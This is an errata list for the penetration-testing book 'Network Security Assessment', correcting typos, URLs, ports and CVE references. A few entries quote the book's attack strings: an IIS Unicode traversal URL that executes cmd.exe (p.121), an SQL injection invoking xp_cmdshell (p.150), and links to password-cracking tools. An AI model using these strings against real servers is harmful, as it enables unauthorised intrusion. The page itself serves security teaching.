Network Security Assessment

Errata for Network Security Assessment

Submit your own errata for this product.


The errata list is a list of errors and their corrections that were found after the product was released. If the error was corrected in a later version or reprint the date of the correction will be displayed in the column titled "Date Corrected".

The following errata were submitted by our customers and approved as valid errors by the author or editor.

Color Key: Serious Technical Mistake Minor Technical Mistake Language or formatting error Typo Question Note Update



Version Location Description Submitted By Date Submitted Date Corrected
Printed
Page 4
Figure 1-1, Penetration Testing

"Wide scope 'no holds barred' approach involving multiple attack vendors..." should read: "...involving multiple attack vectors..."

Anonymous   
Printed
Page 4
Figure 1-1

"Network Security Assessment Automated network scanning and report generation, useful to test networks from opportunistic attack" NOW READS: "Network Security Assessment Effective assessment of Internet- based risks using automated tools and qualification by hand"

Anonymous    Aug 01, 2004
Printed
Page 8
Figure 1-2

The description in the "Brute Force Password Grinding" box: Using multipe vectors... should read: Using multiple vectors...

Anonymous   
Printed
Page 8
Figure 1-2

"Accessible TOP and UDP network services" NOW READS: "Accessible TCP and UDP network services"

Anonymous    Aug 01, 2004
Printed
Page 8
Figure 1-2

The arrow going down from 'Network Enumeration' to 'New domain names and IP addresses' HAS BEEN REVERSED and now points upward.

Anonymous    Aug 01, 2004
Printed
Page 14

http://www.microsoft.com/ntserver/nts/downloads/recommended/netkit/default.asp NOW READS: http://www.microsoft.com/ntserver/nts/downloads/recommended/ntkit/default.asp AND http://www.netxeyes.org/smbcrack.exe NOW READS: http://www.netxeyes.org/SMBCrack.exe

Anonymous    May 01, 2004
Printed
Page 46

"Using half-open SYN flags to probe a target is known as an inverted technique because ... " NOW READS:: "Using malformed TCP flags to probe a target is known as an inverted technique because ... "

Anonymous    May 01, 2004
Printed
Page 49

http://www.eaglenet.org/antirez/hping2.html NOW READS: http://www.hping.org

Anonymous    May 01, 2004
Printed
Page 66
first paragraph

"If some ports don't respond, but others respond with RST/ACK, the unresponsive ports are considered unfiltered" NOW READS: "If some ports don't respond, but others respond with RST/ACK, the responsive ports are considered unfiltered"

Anonymous    Aug 01, 2004
Printed
Page 79

Table 5-1 should include the following two entries: ZXFR denial-of-service CVE-2000-0887 8.2-8.2.2 patch level 6 Large TTL negative CVE-2003-0914 8.3-8.3.7 and 8.4-8.4.3 cache poisoning bug

Anonymous   
Printed
Page 87

snmpwalk -c public 192.168.0.1 NOW READS: snmpwalk -c private 192.168.0.1

Anonymous    May 01, 2004
Printed
Page 87
Example 5-14

"snmpwalk -c public 192.168.0.1" NOW READS: "snmpwalk -c private 192.168.0.1"

Anonymous    Aug 01, 2004
Printed
Page 91

http://www.xfocus.net/exploits NOW READS: http://examples.oreilly.com/9780596006112/tools/bf_ldap.tar.gz

Anonymous    May 01, 2004
Printed
Page 111
OpenSSL

"HEAD / HTTP/1.0" NOW APPERAS in bold.

Anonymous    Aug 01, 2004
Printed
Page 121
Unicode revisited

http://www.example.org/scripts/..%255c../winnt/system32/cmd.exe/?/c+dir NOW READS: http://www.example.org/scripts/..%255c../winnt/system32/cmd.exe?/c+dir

Anonymous    Aug 01, 2004
Printed
Page 122
Example 6-14

"ispc 192.168.189.10/scripts/idq.dll" NOW APPEARS in bold.

Anonymous    Aug 01, 2004
Printed
Page 122

The following sentence HAS BEEN ADDED to the end of the first paragraph, so that ti NOW READS: " ... The iisoop.dll source code is available for analysis at http://www.w00w00.org/files/iisoop.tgz. The bug reference is CVE-2002-0869 and MS02-062."

Anonymous    Aug 01, 2004
Printed
Page 138
About 1/3 down page, the two URLs

http://www.securityfocus.com/archive/75/295545/2003-09-07/2003-09-13/1 http://www.securityfocus.com/archive/75/337304/2003-09-11/2003-09-17/1 NOW READ: http://www.securityfocus.com/archive/75/295545 http://www.securityfocus.com/archive/75/337304

Anonymous    Aug 01, 2004
Printed
Page 150
xp_cmdshell;the following code

"/price.asp?ProductID=12984';EXEC%20master..xp_cmdshell'ping.exe %20212.123.86.4" HAS BEEN REFORMATTED so that it NOW APPEARS: "/price.asp?ProductID=12984';EXEC%20master..xp_cmdshell'ping.exe%20212.123.86.4"

Anonymous    Aug 01, 2004
Printed
Page 151
within the first code example at the top of the page

'net users' NOW READS 'net%20users'

Anonymous    Aug 01, 2004
Printed
Page 162
Table 7-1

"OpenSSH 3.7.1 contains buffer management errors" NOW READS: "OpenSSH 3.7 and prior contains buffer management errors"

Anonymous    Aug 01, 2004
Printed
Page 167
4th line from the bottom

"Running 7350logoout from a Linux platform" NOW READS: "Running 7350logout from a Linux platform".

Anonymous    Aug 01, 2004
Printed
Page 171
2nd paragraph example

"chrismail.trustmatta.com" should be "chris mail.trustmatta.com"

Anonymous   
Printed
Page 172
notes

It is very easy to get from user/bin to user/root under Unix-based systems should be: It is very easy to get from bin privilege to root privilege under Unix-based systems

Anonymous   
Printed
Page 174
1st paragraph

X Consortium was closed in 1996. X is currently maintained by X.org foundation. see http://en.wikipedia.org/wiki/X_Window_System#The_X_Consortium

Anonymous   
Printed
Page 197
Final paragraph

"although this may be difficult to exploit under Solaris." NOW READS: "although this may be difficult to exploit."

Anonymous    Aug 01, 2004
Printed
Page 198
2nd paragraph

heck the MITRE CVE and ... Should be check the MITRE CVE and ...

Anonymous   
Printed
Page 202
Microsoft SQL Server

"The service listens on UDP port 1434 and returns the IP address and port number" should read: "The service listens on UDP port 1434 and returns the server name and port number"

Anonymous   
Printed
Page 202

http://www.sqlsecurity.com/uploads/sqlping.zip NOW READS: http://examples.oreilly.com/9780596006112/tools/sqlping.zip

Anonymous    May 01, 2004
Printed
Page 204

http://www.sqlsecurity.com/uploads/forcesql.zip and http://www.sqlsecurity.com/uploads/sqlbf.zip NOW READ: http://examples.oreilly.com/9780596006112/tools/forcesql.zip and http://examples.oreilly.com/9780596006112/tools/sqlbf.zip

Anonymous    May 01, 2004
Printed
Page 207
fig 8-7 and paragraph above

VSNUM should be: VSNNUM (also the index page 370 needs to be corrected too)

Anonymous   
Printed
Page 210
table 8-5, 3rd entry in the "note" column

Oracle 8i and 9iVersion 8.1.7 and 9.0.1 and prior) TNS Listener... should be: Oracle 8i and 9i(Version 8.1.7 and 9.0.1 and prior) TNS Listener...

Anonymous   
Printed
Page 213
Penultimate paragraph

" , which relates to a remote vulnerability in MySQL 3.23.56 ..." NOW READS: " , which relates to a post-authentication vulnerability in MySQL 3.23.56 ..."

Anonymous    Aug 01, 2004
Printed
Page 215
Microsoft Windows Networking Services

To the list of ports (including loc-srv, netbios-ns, microsoft-ds, etc.), NOW READS: loc-srv 135/tcp ... netbios-ssn 139/tcp microsoft-ds 445/tcp microsoft-ds 445/udp

Anonymous    Aug 01, 2004
Printed
Page 219
rpcdump and ifids, final line

"ncacn_http (RPC over HTTP on TCP port 80 or 593)" NOW READS: "ncacn_http (RPC over HTTP on TCP port 80, 593, or others)" {222, 227, and in the index} "Uriel" NOW READS "Urity"

Anonymous    Aug 01, 2004
Printed
Page 223
Gleaning User Details via SAMR and LSARPC Interfaces, first

paragraph; " .. if the SAMR or LSARPC interfaces are accessible." NOW READS: " .. if the SAMR RPC interface is accessible."

Anonymous    Aug 01, 2004
Printed
Page 232
penultimate paragraph

"An attack can run SMBRelay or LC4 ..." NOW READS: "An attack can run SMBRelay or LC5 ..."

Anonymous    Aug 01, 2004
Printed
Page 234

http://ntsecurity.nu/toolbox/winfo.exe NOW READS: http://ntsecurity.nu/downloads/winfo

Anonymous    May 01, 2004
Printed
Page 241
second paragraph, below Example 9-19

The four instances of "LC4" HAVE BEEN CHANGED to "LC5".

Anonymous    Aug 01, 2004
Printed
Page 252

Table 10-1 NOW INCLUDES CVE-2002-0906, as follows: CVE-2002-0906 28/06/2002 Sendmail 8.12.4 and prior can be compromised if running in a non-default configuration, by an attacker using an authoritative DNS server to provide a malformed TXT record to the mail server upon connecting.

Anonymous    Aug 01, 2004
Printed
Page 255
Table 10-3

the "ISS XFID ... Notes" table heading should have a dark grey shaded background

Anonymous   
Printed
Page 268

(RDP running on TCP port 259) NOW READS: (RDP running on UDP port 259)

Anonymous    May 01, 2004
Printed
Page 275
1st paragraph

Due to the number of different RPC services, associated prognum values, ... should be: Due to the number of different RPC services, associated program values, ...

Anonymous   
Printed
Page 275

Table 12-1 is missing a bug in yppasswd, and currently reads: 100009 yppasswd Yes No No No CVE-2001-0779 should read: 100009 yppasswd Yes No Yes No CVE-2001-0779 CVE-2002-0357

Anonymous   
Printed
Page 275

Table 12-1 is missing three bugs in ttdbserverd, and currently reads: 100083 ttdbserverd Yes No Yes Yes CVE-2001-0717 should read: 100083 ttdbserverd Yes No Yes Yes CVE-1999-0003 CVE-2001-0717 CVE-2002-0677 CVE-2002-0679

Anonymous   
Printed
Page 307

The 'xoa' text at the top of Figure 13-16 should be 'x0a'

Anonymous   
Printed
Page 312
Figure 13-17

"Pointer to formal string" NOW READS: "Pointer to format string"

Anonymous    Aug 01, 2004
Printed
Page 313
Figure 13-18

"Pointer to formal string" NOW READS: "Pointer to format string"

Anonymous    Aug 01, 2004
Printed
Page 327
Example 14-7

"25/tcp open smtp" NOW READS: "23/tcp open telnet"

Anonymous    Aug 01, 2004
Printed
Page 350

The rsync service (port 873) is also susceptible to CAN-2003-0962, so should read "see CVE-2002-0048 and CAN-2003-0962"

Anonymous   
Printed
Page 351

"2401 cvspserver Unix CVS service, vulnerable to a number of attacks" should read: "2401 cvspserver Unix CVS service, vulnerable to a number of attacks; see CVE-2003-0015"

Anonymous   
Printed
Page 351

The rwhois service on TCP port 4321 is also susceptible CVE-2001-0838, so should read "see CVE-2001-0838 and CVE-2001-0913"

Anonymous   
Printed
Page 352

The following should be added to Table A-2: 5135 objectserver IRIX ObjectServer service, can be used to add user accounts on IRIX 6.2 and prior; see CVE-2000-0245

Anonymous